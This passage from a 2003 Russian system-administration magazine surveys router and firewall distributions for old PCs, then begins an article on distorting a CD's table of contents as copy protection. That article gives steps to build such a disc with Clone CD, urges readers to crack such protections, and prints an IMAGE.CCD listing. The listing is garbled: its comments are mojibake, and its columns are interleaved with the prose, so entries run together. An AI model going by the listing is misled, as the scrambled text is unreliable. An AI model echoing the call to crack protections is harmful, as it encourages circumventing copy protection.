числе и пересобранное под свои нужды ядро. Настройка
производится вручную без помощи вспомогательных ути-
лит, но все заготовки можно заранее прописать в .ini- и
.cfg-файлах. Несмотря на необходимость изучения рабо-
ты соответствующих утилит (ipchains и ipmasqadm),
floppyfw со своими обязанностями справляется на «отлич-
но». В Интернете читал много хороших откликов, плюс
ориентированность на безопасность.
Coyote Linux (http://www.coyotelinux.com/). Цель этого
проекта состоит в том, чтобы обеспечить совместный дос-
туп в Интернет, используя одно соединение и больше ни-
чего, но зато без предварительного изучения основ Linux
(хотя это в любом случае только приветствуется). При этом
первоначально необходимо сконфигурировать будущую си-
стему при помощи визарда в Windows (рис.2) или скрипта

Ðèñóíîê 1á.
в Linux. В ходе которого, отвечая на вопросы, можно будет
выбрать размер будущей системы (от 1.44 до 1.73 Мб),
настроить сетевые интерфейсы, оптимизировать под ис-
пользуемый процессор (от 386 без сопроцессора до 486),
задать дополнительные приложения (ssh, webmin и пр.), при
Ðèñóíîê 2.
№9(10), сентябрь 2003
администрирование
этом ничего лишнего в систему не будет добавлено. После
чего система компилируется и записывается на дискету,
которую можно тут же клонировать. Поддерживается толь-
ко два сетевых интерфейса, но в FAQ можно найти ответ,
как создать DMZ (DeMiliterized Zone) для компьютеров, ко-
торым необходимы реальные IP-адреса (www, е-mail, ftp-
серверы) при помощи ifconfig.
Ulric’s Router Construction Kit (http://siag.nu/urck/) позво-
ляет собрать свой роутер на дискете, используя современ-
ные ядра серии 2.4.x. В комплекте идут только базовые
утилиты, но при необходимости можно расширить основ-
ные возможности роутинга за счет пакета Zebra (http://
www.zebra.org/) и пакета Vrrpd (http://w3.arobas.net/~jetienne/
vrrpd/index.html), позволяющего двум маршрутизаторам
контролировать работу друг друга и подстраховать, если
один из них выйдет из строя.
ShareTheNet (http://sharethenet.webserv.com) – вообще-
то один из первых подобных проектов (router + firewall), и
автор на первых порах продавал его очень долго и, как
мне кажется, довольно успешно, только относительно не-
давно (что-то около года) он стал бесплатным и доступ-
ным для свободной закачки. Первоначально необходимо
установить программу под Windows(рис.3), после чего со-
здать при помощи визарда дискету (рис.3а). Удаленное
администрирование также осуществляется при помощи
этой утилиты. Системные требования 80386+ и 8Mб, под-
27
 администрирование

Ðèñóíîê 3.
держивается два сетевых интерфейса (Ethernet и модем).
К сожалению, Linux Router Project (LRP 1997-2002) Дей-
ва Синейджа (Dave Cinege), размещавшийся по адресу
http://linuxrouter.org/, буквально на днях приказал долго
жить, но еще доступны старые версии этого неплохого
дистрибутива. Другой проект, который работал парал-
лельно, LEAF – Linux Embedded Appliance Firewall (http://
leaf.sourceforge.net), поддерживающий ядро 2.4.20 и тему
LRP в нескольких вариациях, все еще продолжает созда-
Ðèñóíîê 3à.
вать маленькие дистрибутивы, которые можно использо-
вать в качестве маршрутизаторов, серверов доступа, тон-
ких серверов и клиентов и прочих простых сетевых встра-
иваемых систем.
FrazierWall Linux (http://www.frazierwall.com/) – еще один
проект, берущий свое начало от LRP и Coyote Linux, но

Ðèñóíîê 4.

28

Ðèñóíîê 4à.
после внесенных изменений уже в принципе заметно от-
личающийся от своих прародителей. Его можно исполь-
зовать в качестве NAT, роутера, firewall. Поддерживают-
ся DHCP для локальных клиентов, time server и отправка
логов firewall и предупреждения защиты по почте. Кроме
этого основной упор был сделан на легкость конфигури-
рования и безопасность. Security обеспечивают дополни-
тельные скрипты и предустановленный набор правил
firewall, позволяющий первоначально установить ее и но-
вичку в этом деле. Системные требования процессор –
i486 и 16 Mб RAM.
Далее речь пойдет о дистрибутивах, требующих уже
СD-ROM для своей установки или работы. Появление их
вполне закономерно и понятно, не все необходимые фун-
кции можно запихнуть на дискету, плюс медленный, но
все-таки постепенный уход этого устройства и распрост-
раненность СD-RW, позволяющая любому записать их на
болванку. Да и мощность «устаревшего» оборудования
постепенно растет, если года три назад это были i386, то
теперь к ним относятся и i586 компьютеры и Celeron пер-
вых выпусков. И вполне естественно, так как записать
свою конфигурацию обратно на СD-ROM не получится,
то в большинстве дистрибутивов имеется опция сохране-
ния их на дискету или для работы необходим уже жест-
кий диск, хотя в этом случае возможны варианты.
Keeper Linux (http://www.keeper.org.uk/) разрабатыва-
№9(10), сентябрь 2003
администрирование
ется в двух вариантах: floppy, требующий две дискеты,
компьютер с процессором i386 и 4 Мб ОЗУ и СD-ROM (13.4
Мб), который загружается и работает только с СD-ROM,
т.е. не требует установки на жесткий диск, и кроме спа-
сательных функций их возможно использовать в качестве
gateway/firewall и dialup gateway. Дискетный вариант име-
ет шесть различных ревизий, каждая из которых направ-
лена на решение одной конкретной задачи (Internet Dialup
Gateway, Full Rescue disk with ssh client support, Local and
Remote admin system with ssh support, Firewall Gateway,
Firewall/routing Gateway и companion disk с основными ути-
литами). СD-ROM-вариант, естественно, имеет все эти и
дополнителные возможности: VPN (Virtual Private Network),
DHCP-сервер и поддержка PPPoA xDSL; Zebra Router, RIP,
OSPF, BGP; клиент и сервер SSH2; Full Rescue Disk
Facilities; syslogd; PPP Dial-on-demand Internet Gateway
(модемный Интернет по требованию). Все это построено
на ядре 2.4.18 с поддержкой большинства устройств. Ин-
тересно, что в целях повышения безопасности файловая
система монтируется только в режиме read-only и не по-
зволяет сохранить настройки на дискету. Чтобы иметь воз-
можность работать со своими настройками, первоначаль-
но необходимо внести свои данные в скачанный образ и
затем уже записывать его на болванку или дискету. Как
это все можно проделать и в какие файлы вносить изме-
нения, очень подробно рассказано в двух документах –
29
 администрирование
Ðèñóíîê 5.
«CDROM Distribution Howto» и «Floppy Distribution Howto»,
которые не грех и просто почитать как пример разделки
подобных дистрибутивов. Теперь при попытке записи в
RAM-устройство система обнаруживает это и просто пе-
резагружается, восстанавливая настройки по умолчанию.
Несмотря на первоначальную возню с образами, он пол-
ностью соответствует своему девизу «Powerful, Reliable
and Secure».
SmoothWall (http://www.smoothwall.org/). Первый дист-
рибутив этого проекта увидел свет в июле 2000 года, со-
здается он администраторами и специалистами по безо-
пасности. Причем самое бурное развитие приходится на
2003 год. Если в конце прошлого (2002) года мне пришлось
работать с версией 0.9.9, то сейчас уже доступна бета 5
версии 2.0 «Orient». Данный дистрибутив построен на со-
временном ядре серии 2.4.21, имеет низкие системные
требования (рекомендуется 486i, 16 Мб ОЗУ), поддержи-
вает кроме разнообразных сетевых устройств (Ethernet
10/100, ISDN, USB ADSL) и обычные аналоговые модемы,
также и IDE CD-ROM (с которого, собственно, произво-
дится инсталляция дистрибутива), и, конечно же, диско-
вод. ISO-образ дистрибутива занимает чуть более 20 Мб.
Установка особой сложности не вызывает. Программа ус-
тановки сама автоматически разбивает диск /dev/hda на
4 раздела (/boot, swap, /var/log и корневой), хотя в даль-
нейшем это можно изменить. В комплект входят все не-
обходимые утилиты для создания и обслуживания фай-
30
ловой системы ext2fs/3fs. Дальше необходимо просто че-
стно ответить на вопросы об IP-адресах (поддерживается
три сетевых интерфейса GREEN, RED, ORANGE, доступ
к которым можно настроить в различных варианциях),
выбрать раскладку клавиатуры, временной пояс и при
необходимости ввести телефонный номер провайдера, но,
к сожалению, только один. Сетевые устройства програм-
ма установки находит сама, при неудаче можно попробо-
вать выбрать из довольно объемистого списка. После все-
го следует запрос трех паролей для пользователей root,
setup (для запуска программы изменения первичных на-
строек /usr/local/sbin/setup) и admin. После окончания про-
цесса установки можно, предварительно достав выехав-
ший диск, запихать компьютер под стол. Все дальнейшие
действия по настройке теперь можно производить через
удобный веб-интерфейс (рис.4, 4а), для чего нужно зайти
по адресу http://smoothwall:81 или https://smoothwall:445 для
работы по защищенному протоколу. И теперь можно уз-
нать статистику о работе роутера (uptime, учет количе-
ства пакетов и скорость передачи по интерфейсам, ис-
пользование диска, пользователи), получить справку о
настройке тех или иных параметров, войти в shell, изме-
нить работу некоторых сервисов, остановить (или пере-
загрузить) роутер или отключить один из интерфейсов.
Теперь о некоторых features. SmootWall выполняет роль
кеширующего веб-сервера (по умолчанию: время обнов-
ления 15 мин, кеш 4 Мб), при необходимости в DHCP-сер-

Ðèñóíîê 5à.
висе нужно просто указать в setup в соответствующей
вкладке диапазон IP-адресов и включить сервис. Кроме
веб-интерфейса можно войти с помощью SSH. В лог-фай-
лах (которые можно импортировать нажатием одной кноп-
ки) можно найти подробные данные сетевой системы пре-
дупреждения о вторжении (NIDS) snort (имя, адрес, дата,
степень опасности и т. д.), подробности работы firewall и
отчеты всех остальных запущенных сервисов и ядра.
Имеется возможность создания VPN, используя IPSec,
устанавливающуюся вместе с системой (трафик при этом
шифруется при помощи алгоритма 3DES). Единственная
сложность при установке SmoothWall, о которой довелось
пока слышать, на очень старых компьютерах (скорее все-
го из-за BIOS) это:
Unable to make boot filesystem
/cdrom/bin/mke2fs: invalid option --j
Т.е. система не может создать раздел ext3. Решается
она, как ни странно, выбором типа установки при помо-
щи http, а не CD-ROM (если канал позволяет).
Надежность старых жестких дисков тоже вызывает со-
мнение, чтобы установить маршрутизатор на одно из ус-
тройств DiskOnChip, использующих NFTL (NAND Flash
Translation Layer), необходимо обратиться к проекту
Routerlinux (http://www.routerlinux.com/). Установив затем
кроме стандартных firewall/router/NAT модем и Ethernet,
можно создать VPN-туннель при помощи IPSec, имеется
№9(10), сентябрь 2003
администрирование
SSH, SNMP и DHCP-сервер, кеширующий DNS-сервер,
zebra RIP, OSPF и BGP, crond и, что приятно, почему-то
редко встречающийся nmap.
Astaro Security Linux (http://www.astaro.com/) – еще один
дистрибутив, основное назначение которого – организа-
ция совместного доступа в Интернет, но вот размер (пос-
ле распаковки архива получается 216 Мб) уже говорит о
серьезности подхода, а название – об основной направ-
ленности. После установки на жесткий диск, кроме firewall
и контекстного фильтра, защищающего в том числе и от
вирусов, можно организовать DMZ, proxy server, SNAT,
DNAT, Masquerading и VPN, которые делают этот дистри-
бутив идеальным решением для защиты сети. Интерес-
но, что при инсталляции можно лишь настроить дистри-
бутив в общих чертах (указывается только IP-адрес са-
мого сервера), основные же настройки можно произво-
дить, либо непосредственно редактируя конфигурацион-
ные файлы, либо более наглядно и проще для новичка
через WebAdmin (рис.5, 5а). При помощи сервиса Up2Date
можно автоматически обновлять компоненты, плюс неко-
торые патчи доступны на сайте. Рекомендуется процес-
сор класса Intel Pentium II, 128 Мб ОЗУ, СD-ROM, жесткий
диск, две или более сетевые карточки. Система поддер-
живает большое количество разнообразных устройств, в
том числе и знает о беспроводных. А документацию, ко-
торой полно как на сайте, так и в дистрибутиве, не грех
почитать и для общего развития.
31
 администрирование
Ðèñóíîê 6.
Кроме Linux, естественно, имеется пара дистрибути-
вов, основанных на BSD.
PicoBSD (http://www.freebsd.org/~picobsd/) представля-
ет собой «one floppy» версию FreeBSD 3.0-current. Имеет-
ся три варианта этой системы: Dialup Version, Networking
Version и Router Version, т.е. полноценная система, кото-
рую можно использовать как для маленького маршрути-
затора, так и повседневного безопасного хождения по
Интернету. Единственное, что не очень удобно для нович-
ков, в угоду маленькому размеру, как и в большинстве
описываемых дистрибутивов, в PicoBSD практически нет
документации, кроме отдельных man-страниц специфи-
ческих для него приложений. Поэтому советую скачать и
файл README, ссылка на который имеется возле каждо-
го дистрибутива. Наличие исходников дает прекрасную
возможность самому собрать PicoBSD под свои нужды.
Дополнительно по адресу http://www.kot.dp.ua/ можно най-
ти скрипты для учета трафика, некоторую переведенную
информацию и другие полезные программы.
ClosedBSD (http://www.closedbsd.org/) также основан на
FreeBSD и использует некоторые специфические для этой
системы приложения вроде ipfw, позволяет создать firewall
или NAT. Причем в отличие от того же PicoBSD большин-
ство основных настроек сетевых устройств можно произ-
вести при помощи вполне понятной системы меню (рис.6,
6а). Естественно, для более тонкого конфигурирования в
32
Ðèñóíîê 6à.
любом случае придется лезть в командную строку, всех
пунктов не предусмотришь. Но чтобы новичку не при-
шлось самому разбираться с опциями firewall, имеется пре-
дустановленный (Basic) набор правил для типичной сис-
темы и режим «Advanced» для добавления своего прави-
ла (надо отметить тоже с шаблонами, что существенно
облегчает работу). Дополнительно имеется пункт меню
monitor для отображения статистик, проходящих через
систему пакетов. В данный момент не поддерживаются
модемы и что-то наподобие IPSec, позволяющие создать
VPN, и, что не очень удобно (но зато безопасно), удален-
ное управление (надеюсь ненадолго). Распространяется
в двух вариантах для записи на дискету и более наворо-
ченный СD-ROM-вариант (12.8 Мб), не требует установки
на жесткий диск, все настройки во втором варианте мож-
но сбросить на дискету. Системные требования по-пре-
жнему невысоки – любой процессор от i386 с 8 Мб RAM в
floppy-варианте и 32 Мб в СD-ROM.
Как видите, выбрасывать старый компьютер еще рано.
Он еще может сослужить хорошую службу и сэкономить
деньги на покупку дорогого маршрутизатора. Дополни-
тельно каждый из представленных дистрибутивов можно
заточить под конкретную сеть и задачи.
администрирование

ИСКАЖЕНИЕ TOC
КАК СРЕДСТВО БОРЬБЫ
С НЕСАНКЦИОНИРОВАННЫМ
КОПИРОВАНИЕМ ДИСКА
Уже давно
Утихло поле боя,
Но сорок тысяч
Воинов Китая
Погибли здесь,
Пожертвовав собою...
Ду Фо
«Оплакиваю поражение при Чэньтао»

Искажение TOC – жестокий, уродливый

но на удивление широко
распространенный прием,
использующийся в доброй половине
защитных механизмов. Штатные
копировщики на таких дисках
в буквальном смысле слова сходят
с ума и едут крышей. Копировщики
защищенных дисков (Clone CD,
Alcohol 120%) к искаженному TOC
относятся гораздо лояльнее,
но требуют для своей работы
определенного сочетания пишущего
и читающего приводов, да и в этом
случае копируют такой диск не всегда.

КРИС КАСПЕРСКИ

34

Пишущий привод обязательно должен поддерживать ре-
жим RAW DAO (Disc At Once), в котором весь диск запи-
сывается за один проход лазера. Режим RAW SAO (Session
At Once) для этих целей совершенно непригоден, посколь-
ку предписывает приводу писать сначала содержимое сес-
сии, а потом – TOC. Как следствие – приводу приходится
самостоятельно анализировать TOC, чтобы определить
стартовый адрес сессии и ее длину. Попытка записать ис-
каженный TOC в режиме SAO в общем случае приводит к
непредсказуемому поведению привода и о работоспособ-
ной копии защищенного диска нечего и думать! Первая
встретившаяся приводу сессия с искаженным TOC обыч-
но оказывается и последней, т.к. остальные сессии пи-
сать уже некуда (искажение TOC обычно преследует цель
увеличения размера сессии до нескольких гигабайт).
Читающий привод помимо режима «сырого» чтения (ко-
торый поддерживают практически все приводы) должен
уметь распознавать искаженный TOC, автоматически пе-
реходя в этом случае на использование «резервного» сред-
ства адресации – Q-канала подкода. В противном случае
сессия, содержащая искаженный TOC, окажется недоступ-
ной для чтения даже на секторном уровне.
Таким образом, копирование дисков с искаженным
TOC осуществимо не на всяком оборудовании и порядка
1/3 моделей «писцов» для этих целей непригодны. Узнать,
поддерживает ли выбранная вами модель привода режим
RAW DAO или нет, можно, в частности, из раздела «Tech
support» справки Clone CD, где перечислены характерис-
тики достаточно большого количества всевозможных при-
водов (впрочем, моих приводов там, увы, нет). Другой
путь – «скормить» приводу SCSI/ATAPI команду 46h (GET
CONFIGURATION) и посмотреть, что он ответит. Из двух
моих «писцов» режим RAW DAO поддерживает один лишь
NEC. С определением возможности чтения искаженных
сессий дела обстоят на порядок сложнее, ибо данная осо-
бенность поведения является исключительно внутренней
характеристикой привода и не афишируется ни самим
приводом, ни его производителями. Приходится выяснять
эту информацию экспериментально. Возьмите диск с чу-
довищно искаженным TOC (о том, как его создать, рас-
сказано ниже), воткните его в привод и попробуйте про-
честь несколько секторов из искаженной сессии. Реак-
ция приводов может быть самой разнообразной. Тот же
PHILIPS в зависимости от «настроения» своих электрон-
ных цепей то рапортует об ошибке чтения, то возвращает
совершенно бессмысленный мусор, в котором не угады-
вается даже синхропоследовательность, возглавляющая
заголовок сырого сектора.
Основной недостаток защитных механизмов с искажен-
ным TOC состоит в том, что некоторые приводы такие дис-
ки просто «не видят» и потому не могут их воспроизвести.
Легальный пользователь, испытавший несовместимость
защиты со своей аппаратурой, в лучшем случае обложит ее
разработчика матом и поспешит вернуть диск продавцу…
если, конечно, сможет вытащить эту «бяку» из недр CD-
ROM, и не факт, что у него получится, поскольку микро-
процессорная начинка некоторых приводов при попытке
анализа искаженного TOC просто «зависает» и привод пол-
ностью абстрагируется от всех раздражителей внешнего
№9(10), сентябрь 2003
администрирование
мира, не реагируя в том числе и на настойчивые попытки
пользователя сделать диску «EJECT». Дырку для аварий-
ного выброса диска, правда, еще никто не отменял1, но, по
слухам, не везде она есть (хотя лично мне приводов без
дырки еще не встречалось), а там где есть – зачастую ока-
зывается скрытой за декоративной панелью или – что бо-
лее вероятно – пользователь может вообще не знать, что
это за отверстие такое, для чего оно предназначено и как
им, собственно, следует пользоваться. На «Макинтошах»
таких дырок нет – это точно (или же «Маковские» пользова-
тели все сплошь идиоты). Во всяком случае, количество су-
дебных исков, поданных последними, в буквальном смысле
слова не поддается ни разуму, ни исчислению. Самое инте-
ресное, что подавляющее большинство этих исков были
удовлетворены и разработчикам пришлось оплатить и «ре-
монт» аппаратуры, и моральный ущерб, и собственно сами
судебные издержки. (Между нами говоря, снятие защиты с
дисков, записанных с грубыми нарушениями стандарта, ко-
ими, в частности, и являются диски с искаженным TOC, не
считается взломом, и не преследуется по закону, поэтому
ломайте, ломайте и еще раз ломайте).
Создание защищенного диска
с искаженным TOC
Для создания защищенного диска с искаженным TOC нам
понадобится: любая программа записи на диск, умеющая
создавать многосессионные диски (например, Roxio Easy
CD Creator), копировщик защищенных дисков, сохраняю-
щий содержимое TOC в текстовом файле, доступном для
редактирования (мы выбираем Clone CD), и, естественно,
сам пишущий привод, поддерживающий режим сырой за-
писи в режиме DAO. Для облегчения восприятия материа-
ла все действия будут расписаны по шагам, хотя это выг-
лядит и не слишком литературно.
Шаг первый
Достаем из упаковки CD-R болванку или – что даже луч-
ше – засовываем в привод потертый жизнью CD-RW диск
и записываем на него пару сессий в штатном режиме.
Будет лучше (вернее, нагляднее), если вторая сессия бу-
дет включать в себя файлы первой сессии – той самой
сессии, чей TOC мы и собираемся искажать. Интересно,
сможет ли привод прочесть ее содержимое или нет?
Шаг второй
Запускаем Clone CD и просим его создать образ ориги-
нального диска (выбираемый профиль настроек на дан-
ном этапе некритичен, поскольку диск еще не защищен,
то с равным успехом можно использовать как «CD с дан-
ными», так и «Protected PC Game»; галочку «создавать
Cue-Sheet» взводить необязательно – все равно она дей-
ствительна лишь на односессионных CD).
Шаг третий
Если все сделано правильно и программно-аппаратное
обеспечение во всей своей совокупности работает нор-
мально, на жестком диске должны образоваться три фай-
ла: IMAGE.CCD, – несущий в себе содержимое Q-канала
подкода Lead-In области или, попросту говоря, TOC;
35
 администрирование
IMAGE.IMG – «сырой» образ диска со всеми секторами от [Entry 2] ; äàííûå ýëåìåíòà TOC ¹2
Session=1 ; ýëåìåíò ñåññèè 1
00:00:02 до «сколько-на-диске-есть-там» и IMAGE.SUB – со- Point=0xa2 ; ïîëîæåíèå Lead-out-îáëàñòè
держимое полей подкода «программной» части диска. ; â PMin:PSec:PFrame
ADR=0x01 ; q-Mode == 1
Последний файл в принципе может и отсутствовать (он Control=0x04 ; äèñê ñ äàííûìè, çàïðåùåííûé
создается только, если взведена галочка «Чтение субка- ; äëÿ êîïèðîâàíèÿ
TrackNo=0 ; òðåê, êîòîðûé ìû ñåé÷àñ ÷èòàåì, –
налов из треков с данными»), но это некритично, т.к. сей- ; ýòî Lead-in-òðåê (ò.å. TOC)
час нас в первую очередь интересуют не каналы подко- AMin=0 ; \
ASec=0 ; + - àáñîëþòíûé àäðåñ òåêóùåãî òðåêà
да, а сам TOC! AFrame=0 ; /
Откроем файл IMAGE.CCD в любом текстовом редак- ALBA=-150 ; LBA-àäðåñ òåêóùåãî òðåêà
Zero=0 ; ýòî ïîëå äîëæíî áûòü ðàâíî íóëþ,
торе и попытаемся перевести расклад геометрии диска ; êàê îíî è åñòü
на человеческий язык. PMin=0 ; \
PSec=29 ; + - àáñîëþòíûé àäðåñ Lead-out-îáëàñòè
; ñåññèè 1
Ëèñòèíã 1. Ñîäåðæèìîå íåèñêàæåííîãî TOC â ñûðîì âèäå. Îáîá- PFrame=33 ; /
ùåííî ãîâîðÿ, äèñê ñîäåðæèò äâå ñåêöèè – ïî îäíîìó òðåêó PLBA=2058 ; LBA-àäðåñ Lead-out-îáëàñòè ñåññèè 1
êàæäàÿ. Àáñîëþòíûé àäðåñ íà÷àëà ïåðâîãî òðåêà 00:00:02,
àáñîëþòíûé àäðåñ Lead-out-îáëàñòè ïåðâîé ñåññèè 00:29:33 [Entry 3] ; äàííûå ýëåìåíòà TOC ¹3
(àäðåñ ïîñëåäíåãî ñåêòîðà òðåêà íà äâå ñåêóíäû êîðî÷å), Session=1 ; ýëåìåíò ñåññèè 1
àáñîëþòíûé àäðåñ íà÷àëà âòîðîãî òðåêà 03:01:33, à àáñîëþò- Point=0x01 ; äàííûå òðåêà 1 ñåññèè 1
íûé àäðåñ Lead-out âòîðîé ñåññèè 03:24:33. Ìàêñèìàëüíî äî- ADR=0x01 ; q-Mode == 1
ñòèæèìàÿ åìêîñòü äèñêà 22:14:34 (õîòÿ íà ñàìîì äèñêå è Control=0x04 ; äèñê ñ äàííûìè, çàïðåùåííûé
íàïèñàíî, ÷òî îí 23-ìèíóòíûé). ; äëÿ êîïèðîâàíèÿ
TrackNo=0 ; òðåê, êîòîðûé ìû ñåé÷àñ ÷èòàåì, –
[CloneCD] ; äàííûå î Clone CD ; ýòî Lead-in-òðåê (ò.å. TOC)
Version=3 ; âåðñèÿ Clone CD. AMin=0 ; \
ASec=0 ; + - àáñîëþòíûé àäðåñ òåêóùåãî òðåêà
[Disc] ; äàííûå äèñêà AFrame=0 ; /
TocEntries=12 ; êîëè÷åñòâî ýëåìåíòîâ TOC ALBA=-150 ; LBA-àäðåñ òåêóùåãî òðåêà
Sessions=2 ; êîëè÷åñòâî ñåññèé = 2 Zero=0 ; ýòî ïîëå äîëæíî áûòü ðàâíî íóëþ,
DataTracksScrambled=0 ; ïîëå DVD (ñì. inf-8090), äëÿ CD ; êàê îíî è åñòü
; ýòà èíôîðìàöèÿ ëèøåíà ñìûñëà PMin=0 ; \
CDTextLength=0 ; CD-Text â ïîëÿõ ïîäêîäà PSec=2 ; + - àáñîëþòíûé àäðåñ íà÷àëà òðåêà 1
; Lead-in-îáëàñòè îòñóòñòâóåò ; ñåññèè 1
[Session 1] ; äàííûå ñåññèè 1 PFrame=0 ; /
PreGapMode=1 ; òèï òðåêà Mode 1 (òðåê ñ äàííûìè, PLBA=0 ; LBA-àäðåñ íà÷àëà òðåêà 1 ñåññèè 1
; 2048 áàéò äàííûõ)
PreGapSubC=0 ; äàííûõ ïîäêàíàëà íåò [Entry 4] ; äàííûå ýëåìåíòà TOC ¹4
Session=1 ; ýëåìåíò ñåññèè 1
[Session 2] ; äàííûå ñåññèè 2 Point=0xb0 ; ïîçèöèÿ ñëåäóþùèé çàïèñûâàåìîé îáëàñòè
PreGapMode=1 ; òèï òðåêà Mode 1 (òðåê ñ äàííûìè, ; â AMin:ASec:AFrame
; 2048 áàéò äàííûõ) ADR=0x05 ; q-Mode == 1
PreGapSubC=0 ; äàííûõ ïîäêàíàëà íåò Control=0x04 ; äèñê ñ äàííûìè, çàïðåùåííûé
; äëÿ êîïèðîâàíèÿ
[Entry 0] ; äàííûå ýëåìåíòà TOC ¹0 TrackNo=0 ; òðåê, êîòîðûé ìû ñåé÷àñ ÷èòàåì, –
Session=1 ; ýëåìåíò ñåññèè 1 ; ýòî Lead-in-òðåê (ò.å. TOC)
Point=0xa0 ; íîìåð ïåðâîãî òðåêà ñåññèè 1 AMin=2 ; \
; â PMin/òèï äèñêà â PSec ASec=59 ; + - àáñîëþòíûé àäðåñ ñëåäóþùåé
ADR=0x01 ; q-Mode == 1 ; çàïèñûâàåìîé îáëàñòè
Control=0x04 ; äèñê ñ äàííûìè, çàïðåùåííûé AFrame=33 ; /
; äëÿ êîïèðîâàíèÿ ALBA=13308 ; LBA-àäðåñ ñëåäóþùåé çàïèñûâàåìîé îáëàñòè
TrackNo=0 ; òðåê, êîòîðûé ìû ñåé÷àñ ÷èòàåì, – Zero=3 ; êîë-âî pointer â Mode 5
; ýòî Lead-in-òðåê (ò.å. TOC) PMin=22 ; \
AMin=0 ; \ PSec=14 ; + - àáñîëþòíûé àäðåñ ìàêñèìàëüíîé
ASec=0 ; + àáñîëþòíûé àäðåñ òåêóùåãî òðåêà ; çàïèñûâàåìîé îáëàñòè
AFrame=0 ; / PFrame=34 ; /
ALBA=-150 ; LBA-àäðåñ òåêóùåãî òðåêà PLBA=99934 ; LBA-àäðåñ ìàêñèìàëüíîé çàïèñûâàåìîé
Zero=0 ; ýòî ïîëå äîëæíî áûòü ðàâíî íóëþ, ; îáëàñòè
; êàê îíî è åñòü [Entry 5] ; äàííûå ýëåìåíòà TOC ¹5
PMin=1 ; íîìåð ïåðâîãî òðåêà ñåññèè 1 Session=1 ; ýëåìåíò ñåññèè 1
PSec=0 ; òèï äèñêà CD-DA è CD-ROM-äèñê â Mode 1 Point=0xc0 ; ñòàðòîâûé àäðåñ Lead-in-îáëàñòè
PFrame=0 ; íå íåñåò íèêàêîé ïîëåçíîé èíôîðìàöèè ; Hybrid-äèñêà (åñëè îí åñòü)
PLBA=4350 ; íîìåð òðåêà, ïðåäñòàâëåííûé Clone CD ADR=0x05 ; Mode 5 (Îðàíæåâàÿ êíèãà)
; êàê LBA-àäðåñ, ò.å. ãëóïîñòü Control=0x04 ; äèñê ñ äàííûìè, çàïðåùåííûé
[Entry 1] ; äàííûå ýëåìåíòà TOC ¹1 ; äëÿ êîïèðîâàíèÿ
Session=1 ; ýëåìåíò ñåññèè 1 TrackNo=0 ; òðåê, êîòîðûé ìû ñåé÷àñ ÷èòàåì, –
Point=0xa1 ; íîìåð ïîñëåäíåãî òðåêà ñåññèè 1 â PMin ; ýòî Lead-in-òðåê (ò.å. TOC)
ADR=0x01 ; q-Mode == 1 AMin=162 ; ðåêîìåíäóåìàÿ ìîùíîñòü ëàçåðà äëÿ çàïèñè
Control=0x04 ; äèñê ñ äàííûìè, çàïðåùåííûé ASec=128 ; Application code
; äëÿ êîïèðîâàíèÿ AFrame=140 ; çàðåçåðâèðîâàíî
TrackNo=0 ; òðåê, êîòîðûé ìû ñåé÷àñ ÷èòàåì, – ALBA=288590 ; LBA-"àäðåñ" òðåõ ïðåäûäóùèõ ïîëåé
; ýòî Lead-in-òðåê (ò.å. TOC) Zero=0 ; çàðåçåðâèðîâàíî
AMin=0 ; \ PMin=97 ; \
ASec=0 ; + àáñîëþòíûé àäðåñ òåêóùåãî òðåêà PSec=27 ; + - àáñîëþòíûé àäðåñ Lead-in-îáëàñòè
AFrame=0 ; / ; Hybrid-äèñêà
ALBA=-150 ; LBA-àäðåñ òåêóùåãî òðåêà PFrame=21 ; / (àäðåñ ëåæèò çà ïðåäåëàìè äèñêà,
Zero=0 ; ýòî ïîëå äîëæíî áûòü ðàâíî íóëþ, ; ò.å. Hybrid-äèñêà íåò)
; êàê îíî è åñòü PLBA=-11604 ; LBA-àäðåñ Lead-in-îáëàñòè Hybrid
PMin=1 ; íîìåð ïîñëåäíåãî òðåêà ñåññèè 1 ; (âû÷èñëåí ñ ïåðåïîëíåíèåì)
;(â ñåññèè òîëüêî îäèí òðåê) [Entry 6] ; äàííûå ýëåìåíòà TOC ¹6
PSec=0 ; íå íåñåò íèêàêîé ïîëåçíîé èíôîðìàöèè Session=1 ; ýëåìåíò ñåññèè 1
PFrame=0 ; íå íåñåò íèêàêîé ïîëåçíîé èíôîðìàöèè Point=0xc1 ; êîïèÿ ATIP-èíôîðìàöèè
PLBA=4350 ; íîìåð òðåêà, ïðåäñòàâëåííûé Clone CD ADR=0x05 ; -+
; êàê LBA-àäðåñ, ò.å. ãëóïîñòü Control=0x04 ; -+

36
 администрирование
TrackNo=0 ; -+ PMin=3 ; \
AMin=4 ; -+ PSec=1 ; + - àáñîëþòíûé àäðåñ íà÷àëà òðåêà 2
ASec=120 ; -+ ; ñåññèè 2
AFrame=96 ; -+ PFrame=33 ; /
ALBA=26946 ; -+ – ATIP-èíôîðìàöèÿ PLBA=13458 ; LBA-àäðåñ íà÷àëà òðåêà 2 ñåññèè 2
Zero=0 ; -+
PMin=0 ; -+ [Entry 11] ; äàííûå ýëåìåíòà TOC ¹11
PSec=0 ; -+ Session=2 ; ýëåìåíò ñåññèè 2
PFrame=0 ; -+ Point=0xb0 ; àäðåñ ñëåäóþùåé çàïèñûâàåìîé îáëàñòè
PLBA=-150 ; -+ ; â AMin:ASec:AFrame
ADR=0x05 ; Mode 5
[Entry 7] ; äàííûå ýëåìåíòà TOC ¹7 Control=0x04 ; äèñê ñ äàííûìè, çàïðåùåííûé
Session=2 ; ýëåìåíò ñåññèè 2 (âîò ìû è äîáðàëèñü ; äëÿ êîïèðîâàíèÿ
; äî ñåññèè 2!) TrackNo=0 ; òðåê, êîòîðûé ìû ñåé÷àñ ÷èòàåì, –
Point=0xa0 ; íîìåð ïåðâîãî òðåêà ñåññèè 2 ; ýòî Lead-in-òðåê (ò.å. TOC)
; â PMin/òèï äèñêà â PSec AMin=4 ; \
ADR=0x01 ; q-Mode == 1 ASec=54 ; + - àáñîëþòíûé àäðåñ ñëåäóþùåé
Control=0x04 ; äèñê ñ äàííûìè, çàïðåùåííûé ; çàïèñûâàåìîé îáëàñòè
; äëÿ êîïèðîâàíèÿ AFrame=23 ; /
TrackNo=0 ; òðåê, êîòîðûé ìû ñåé÷àñ ÷èòàåì, – ALBA=21923 ; LBA-àäðåñ ñëåäóþùåé çàïèñûâàåìîé îáëàñòè
; ýòî Lead-in-òðåê (ò.å. TOC) Zero=1 ; êîëè÷åñòâî pointer Mode 5
AMin=0 ; \ PMin=22 ; \
ASec=0 ; + - àáñîëþòíûé àäðåñ òåêóùåãî òðåêà PSec=14 ; + - àáñîëþòíûé àäðåñ ïîñëåäíåé
